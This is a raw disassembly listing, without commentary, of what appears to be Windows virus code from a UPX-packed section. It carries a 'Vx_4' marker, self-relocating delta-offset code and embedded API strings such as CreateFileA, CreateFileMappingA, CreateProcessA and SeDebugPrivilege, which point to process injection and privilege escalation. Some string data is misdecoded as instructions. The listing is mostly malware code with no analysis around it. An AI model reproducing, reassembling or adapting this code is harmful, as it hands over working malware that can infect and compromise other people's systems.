push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_3143A383: ; CODE XREF: UPX2:3143A367�j
; UPX2:3143A378�j
call sub_3143A540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_3143A3CC: ; CODE XREF: UPX2:3143A3D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_3143A3CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_3143A534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143A17E
loc_3143A534: ; CODE XREF: sub_3143A17E+1F�j
; sub_3143A17E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_3143A0F0
; END OF FUNCTION CHUNK FOR sub_3143A17E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_3143A540 proc near ; CODE XREF: UPX2:loc_3143A383�p
; sub_3143A55F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_3143A540 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_3143A55F proc near ; CODE XREF: sub_3143A17E+9�p
xor ecx, ecx
call sub_3143A540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_3143A55F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 3 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_3143A59C proc near ; CODE XREF: sub_3143A17E+7C�p
; UPX2:3143A312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_3143A5A7: ; CODE XREF: sub_3143A59C+E�j
lodsb
test al, al
jnz short loc_3143A5A7
loop sub_3143A59C
retn
sub_3143A59C endp
; =============== S U B R O U T I N E =======================================
sub_3143A5AF proc near ; CODE XREF: sub_3143C12D+25�p
; FUNCTION CHUNK AT 3143A639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 3143AA09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_3143A5DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_3143A639
jbe short near ptr loc_3143A639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_3143A640
inc ecx
loc_3143A5DC: ; CODE XREF: sub_3143A5AF+13�p
add [eax-1], dl
sub_3143A5AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143A5AF
loc_3143A639: ; CODE XREF: sub_3143A5AF+1F�j
; sub_3143A5AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3143A6A3+2
loc_3143A640: ; CODE XREF: sub_3143A5AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_3143A6AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3143A6B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3143A6C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_3143A6E1+1
push 4500746Fh
js short loc_3143A6DF
jz short near ptr loc_3143A6CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_3143A700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_3143A6E3+6
loc_3143A6A3: ; CODE XREF: sub_3143A5AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_3143A6AB: ; CODE XREF: sub_3143A5AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_3143A6F2
add [edi+65h], al
jz short near ptr loc_3143A6FB+1
loc_3143A6B6: ; CODE XREF: sub_3143A5AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_3143A708
loc_3143A6C2: ; CODE XREF: sub_3143A5AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_3143A6CB: ; CODE XREF: sub_3143A5AF+C7�j
db 65h
jz short near ptr loc_3143A71A+1
outsd
db 64h
jnz short near ptr loc_3143A739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_3143A72D+6
loc_3143A6DF: ; CODE XREF: sub_3143A5AF+C5�j
db 65h
insd
loc_3143A6E1: ; CODE XREF: sub_3143A5AF+BE�j
jo short near ptr loc_3143A727+2
loc_3143A6E3: ; CODE XREF: sub_3143A5AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_3143A741+3
db 65h
insd
loc_3143A6F2: ; CODE XREF: sub_3143A5AF+FF�j
jo short near ptr loc_3143A741+3
popa
jz short near ptr loc_3143A75E+1
inc ecx
add [edi+65h], al
loc_3143A6FB: ; CODE XREF: sub_3143A5AF+105�j
jz short loc_3143A753
db 65h
jb short near ptr loc_3143A772+1
loc_3143A700: ; CODE XREF: sub_3143A5AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_3143A708: ; CODE XREF: sub_3143A5AF+110�j
db 65h
jb short near ptr loc_3143A77C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_3143A76B+1
outsd
insb
jnz short near ptr loc_3143A781+6
loc_3143A71A: ; CODE XREF: sub_3143A5AF:loc_3143A6CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_3143A78C+2
popa
jz short near ptr loc_3143A78C+1
outsd
outsb
inc ecx
loc_3143A727: ; CODE XREF: sub_3143A5AF:loc_3143A6E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_3143A72D: ; CODE XREF: sub_3143A5AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_3143A78F
loc_3143A739: ; CODE XREF: sub_3143A5AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_3143A741: ; CODE XREF: sub_3143A5AF+13F�j
; sub_3143A5AF:loc_3143A6F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_3143A753: ; CODE XREF: sub_3143A5AF:loc_3143A6FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_3143A7C9+1
arpl [ebp+73h], sp
loc_3143A75E: ; CODE XREF: sub_3143A5AF+146�j
jnb short $+2
push eax
jb short loc_3143A7D2
arpl [ebp+73h], sp
jnb short near ptr loc_3143A794+7
xor al, [esi+69h]
loc_3143A76B: ; CODE XREF: sub_3143A5AF+164�j
jb short near ptr loc_3143A7DA+6
jz short $+2
push eax
jb short near ptr loc_3143A7DA+7
loc_3143A772: ; CODE XREF: sub_3143A5AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_3143A7A9+1
xor cl, [esi+65h]
js short near ptr loc_3143A7EC+4
loc_3143A77C: ; CODE XREF: sub_3143A5AF:loc_3143A708�j
add [ebx+65h], dl
jz short near ptr loc_3143A7C5+2
loc_3143A781: ; CODE XREF: sub_3143A5AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_3143A78C: ; CODE XREF: sub_3143A5AF+173�j
; sub_3143A5AF+170�j
db 65h
jnb short loc_3143A7D0
loc_3143A78F: ; CODE XREF: sub_3143A5AF+188�j
add [ebx+65h], dl
jz short loc_3143A7DA
loc_3143A794: ; CODE XREF: sub_3143A5AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_3143A818
jz short loc_3143A80C
insd
push esp
loc_3143A7A9: ; CODE XREF: sub_3143A5AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_3143A813
imul esp, [ebp+77h], 6946664Fh
insb
loc_3143A7C5: ; CODE XREF: sub_3143A5AF+1D0�j
add gs:[esi+69h], dl
loc_3143A7C9: ; CODE XREF: sub_3143A5AF+1AA�j
jb short near ptr loc_3143A83E+1
jnz short loc_3143A82E
insb
inc ecx
insb
loc_3143A7D0: ; CODE XREF: sub_3143A5AF:loc_3143A78C�j
insb
outsd
loc_3143A7D2: ; CODE XREF: sub_3143A5AF+1B2�j
arpl [eax], ax
push edi
jb short loc_3143A840
jz short loc_3143A83E
inc esi
loc_3143A7DA: ; CODE XREF: sub_3143A5AF+1E3�j
; sub_3143A5AF:loc_3143A76B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_3143A85A
push eax
jb short near ptr loc_3143A84F+3
jbe short near ptr loc_3143A84F+5
insb
loc_3143A7EC: ; CODE XREF: sub_3143A5AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 0A845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3143A83B+1
jb short near ptr loc_3143A85F+1
popa
jz short loc_3143A863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_3143A870
push eax
loc_3143A80C: ; CODE XREF: sub_3143A5AF+1F6�j
jb short loc_3143A87D
arpl [ebp+73h], sp
jnb short $+2
loc_3143A813: ; CODE XREF: sub_3143A5AF+20C�j
dec esi
jz short near ptr loc_3143A856+3
jb short loc_3143A87D
loc_3143A818: ; CODE XREF: sub_3143A5AF+1F4�j
popa
jz short loc_3143A880
push eax
jb short loc_3143A88D
arpl [ebp+73h], sp
jnb short near ptr loc_3143A863+5
js short $+2
dec esi
jz short loc_3143A86B
jb short loc_3143A88F
popa
jz short near ptr loc_3143A88F+3
push ebx
loc_3143A82E: ; CODE XREF: sub_3143A5AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_3143A89E+1
popa
loc_3143A83B: ; CODE XREF: sub_3143A5AF+248�j
jz short loc_3143A8A2
push ebp
loc_3143A83E: ; CODE XREF: sub_3143A5AF+228�j
; sub_3143A5AF:loc_3143A7C9�j
jnb short near ptr loc_3143A8A4+1
loc_3143A840: ; CODE XREF: sub_3143A5AF+226�j
jb short near ptr loc_3143A88F+3
jb short loc_3143A8B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_3143A899
popa
jo short near ptr loc_3143A8A4+1
loc_3143A84F: ; CODE XREF: sub_3143A5AF+238�j
; sub_3143A5AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_3143A856: ; CODE XREF: sub_3143A5AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_3143A85A: ; CODE XREF: sub_3143A5AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_3143A85F: ; CODE XREF: sub_3143A5AF+24A�j
jo short loc_3143A8C6
outsb
inc esi
loc_3143A863: ; CODE XREF: sub_3143A5AF+24D�j
; sub_3143A5AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_3143A86B: ; CODE XREF: sub_3143A5AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_3143A8DF
loc_3143A870: ; CODE XREF: sub_3143A5AF+25A�j
arpl [ebp+73h], sp
jnb short loc_3143A8C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3143A8CB+1
loc_3143A87D: ; CODE XREF: sub_3143A5AF:loc_3143A80C�j
; sub_3143A5AF+267�j
jo short near ptr loc_3143A8E3+1
outsb
loc_3143A880: ; CODE XREF: sub_3143A5AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_3143A8FB+1
loc_3143A88D: ; CODE XREF: sub_3143A5AF+26D�j
jz short near ptr loc_3143A8F3+1
loc_3143A88F: ; CODE XREF: sub_3143A5AF+279�j
; sub_3143A5AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_3143A909
jnz short near ptr loc_3143A8F7+1
insb
dec ebp
loc_3143A899: ; CODE XREF: sub_3143A5AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_3143A914+3
loc_3143A89E: ; CODE XREF: sub_3143A5AF+289�j
add [esi+74h], cl
push ecx
loc_3143A8A2: ; CODE XREF: sub_3143A5AF:loc_3143A83B�j
jnz short loc_3143A909
loc_3143A8A4: ; CODE XREF: sub_3143A5AF:loc_3143A83E�j
; sub_3143A5AF+29E�j
jb short near ptr loc_3143A91E+1
dec ecx
outsb
outsw
jb short near ptr loc_3143A918+1
popa
jz short loc_3143A918
outsd
outsb
push esp
outsd
loc_3143A8B3: ; CODE XREF: sub_3143A5AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3143A90F+2
jb short loc_3143A925
jz short near ptr loc_3143A922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_3143A8C6: ; CODE XREF: sub_3143A5AF:loc_3143A85F�j
db 65h
insd
outsd
loc_3143A8C9: ; CODE XREF: sub_3143A5AF+2C4�j
jb short loc_3143A944
loc_3143A8CB: ; CODE XREF: sub_3143A5AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_3143A941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_3143A8DF: ; CODE XREF: sub_3143A5AF+2BF�j
outsb
jnb short near ptr loc_3143A94A+1
push ebx
loc_3143A8E3: ; CODE XREF: sub_3143A5AF:loc_3143A87D�j
jz short loc_3143A957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_3143A950
jb short loc_3143A965
jnz short near ptr loc_3143A962+1
loc_3143A8F3: ; CODE XREF: sub_3143A5AF:loc_3143A88D�j
add [ebx+6Ch], ah
outsd
loc_3143A8F7: ; CODE XREF: sub_3143A5AF+2E6�j
jnb short loc_3143A95E
jnb short near ptr loc_3143A969+1
loc_3143A8FB: ; CODE XREF: sub_3143A5AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_3143A909: ; CODE XREF: sub_3143A5AF+2E4�j
; sub_3143A5AF:loc_3143A8A2�j
db 65h
jz short near ptr loc_3143A973+1
outsd
jnb short near ptr loc_3143A981+2
loc_3143A90F: ; CODE XREF: sub_3143A5AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_3143A914: ; CODE XREF: sub_3143A5AF+2ED�j
add gs:[edx+65h], dh
loc_3143A918: ; CODE XREF: sub_3143A5AF+2FE�j
; sub_3143A5AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_3143A981+1
outsb
loc_3143A91E: ; CODE XREF: sub_3143A5AF:loc_3143A8A4�j
add fs:[ebx+6Fh], dh
loc_3143A922: ; CODE XREF: sub_3143A5AF+30D�j
arpl [ebx+65h], bp
loc_3143A925: ; CODE XREF: sub_3143A5AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_3143A990
jb short loc_3143A99B
db 65h
jz short loc_3143A973
insb
outsd
jnb short near ptr loc_3143A998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_3143A9A4
jb short near ptr loc_3143A9AE+1
loc_3143A941: ; CODE XREF: sub_3143A5AF+329�j
db 65h
jz short loc_3143A98B
loc_3143A944: ; CODE XREF: sub_3143A5AF:loc_3143A8C9�j
db 65h
jz short loc_3143A98A
outsd
outsb
outsb
loc_3143A94A: ; CODE XREF: sub_3143A5AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_3143A950: ; CODE XREF: sub_3143A5AF+33E�j
jz short near ptr loc_3143A9B2+1
jz short loc_3143A9B9
add [ecx+6Eh], cl
loc_3143A957: ; CODE XREF: sub_3143A5AF:loc_3143A8E3�j
jz short near ptr loc_3143A9BC+2
jb short loc_3143A9C9
db 65h
jz short near ptr loc_3143A9AB+2
loc_3143A95E: ; CODE XREF: sub_3143A5AF:loc_3143A8F7�j
jo short loc_3143A9C5
outsb
inc ecx
loc_3143A962: ; CODE XREF: sub_3143A5AF+342�j
add [ecx+6Eh], cl
loc_3143A965: ; CODE XREF: sub_3143A5AF+340�j
jz short near ptr loc_3143A9CB+1
jb short loc_3143A9D7
loc_3143A969: ; CODE XREF: sub_3143A5AF+34A�j
db 65h
jz short near ptr loc_3143A9BA+1
jo short loc_3143A9D3
outsb
push ebp
jb short near ptr loc_3143A9DC+2
inc ecx
loc_3143A973: ; CODE XREF: sub_3143A5AF+37E�j
; sub_3143A5AF:loc_3143A909�j
add [ecx+6Eh], cl
jz short near ptr loc_3143A9DC+1
jb short loc_3143A9E8
db 65h
jz short near ptr loc_3143A9CE+1
db 65h
popa
db 64h
inc esi
loc_3143A981: ; CODE XREF: sub_3143A5AF+36C�j
; sub_3143A5AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_3143A98A: ; CODE XREF: sub_3143A5AF:loc_3143A944�j
dec ecx
loc_3143A98B: ; CODE XREF: sub_3143A5AF:loc_3143A941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_3143A990: ; CODE XREF: sub_3143A5AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_3143A998: ; CODE XREF: sub_3143A5AF+383�j
jnb short near ptr loc_3143A9FD+2
dec ebx
loc_3143A99B: ; CODE XREF: sub_3143A5AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_3143AA09
loc_3143A9A4: ; CODE XREF: sub_3143A5AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_3143A9EC+2
js short loc_3143A9EC
loc_3143A9AB: ; CODE XREF: sub_3143A5AF+3AC�j
add [edx+65h], dl
loc_3143A9AE: ; CODE XREF: sub_3143A5AF+390�j
db 67h
push ecx
jnz short loc_3143AA17
loc_3143A9B2: ; CODE XREF: sub_3143A5AF:loc_3143A950�j
jb short near ptr loc_3143AA2C+1
push esi
popa
insb
jnz short near ptr loc_3143AA1D+1
loc_3143A9B9: ; CODE XREF: sub_3143A5AF+3A3�j
inc ebp
loc_3143A9BA: ; CODE XREF: sub_3143A5AF:loc_3143A969�j
js short loc_3143A9FD
loc_3143A9BC: ; CODE XREF: sub_3143A5AF:loc_3143A957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_3143AA1A
popa
loc_3143A9C5: ; CODE XREF: sub_3143A5AF:loc_3143A95E�j
insb
jnz short near ptr loc_3143AA2C+1
inc ebp
loc_3143A9C9: ; CODE XREF: sub_3143A5AF+3AA�j
js short loc_3143AA0C
loc_3143A9CB: ; CODE XREF: sub_3143A5AF:loc_3143A965�j
add [esi+33h], dl
loc_3143A9CE: ; CODE XREF: sub_3143A5AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_3143A9D3: ; CODE XREF: sub_3143A5AF+3BD�j
mov edx, esp
push 1
loc_3143A9D7: ; CODE XREF: sub_3143A5AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_3143A9DC: ; CODE XREF: sub_3143A5AF+3C7�j
; sub_3143A5AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_3143A9E8: ; CODE XREF: sub_3143A5AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_3143A9EC: ; CODE XREF: sub_3143A5AF+3FA�j
; sub_3143A5AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_3143A5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ; û
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_3143A9FD: ; CODE XREF: sub_3143A5AF:loc_3143A9BA�j
; sub_3143A5AF:loc_3143A998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ; è
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143A5AF
loc_3143AA09: ; CODE XREF: sub_3143A5AF+3F3�j
add [edx+5], ch
loc_3143AA0C: ; CODE XREF: sub_3143A5AF:loc_3143A9C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_3143AA17: ; CODE XREF: sub_3143A5AF+401�j
push esp
push 40h
loc_3143AA1A: ; CODE XREF: sub_3143A5AF+412�j
push ecx
push edx
push ebx
loc_3143AA1D: ; CODE XREF: sub_3143A5AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_3143AA2C: ; CODE XREF: sub_3143A5AF:loc_3143A9B2�j
; sub_3143A5AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_3143A5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ; •
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ; É
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ; ‹
db 0C4h ; Ä
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ; ƒ
db 0C0h ; À
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ; •
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 20h
db 33h ; 3
db 0D2h ; Ò
db 85h ; …
db 0C0h ; À
db 0Fh
db 99h ; ™
db 0C2h ; Â
db 0F7h ; ÷
db 0DAh ; Ú
db 58h ; X
db 23h ; #
db 0C2h ; Â
db 0C3h ; Ã
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ; è
db 0C1h ; Á
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ; „
db 0A5h ; ¥
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ; ‹
db 0D4h ; Ô
db 6Ah ; j
db 0
db 8Bh ; ‹
db 0CCh ; Ì
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ; •
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ; •
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ; ‹
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ; ã
db 0Ch
db 8Dh ;
db 95h ; •
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ; Ñ
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ; Ò
db 8Bh ; ‹
db 85h ; …
db 0FEh ; þ
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ; è
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ; è
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ; è
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0F4h ; ô
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ; „
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0DFh ; ß
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0C7h ; Ç
db 5Fh ; _
db 0C3h ; Ã
db 55h ; U
db 0E8h ; è
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
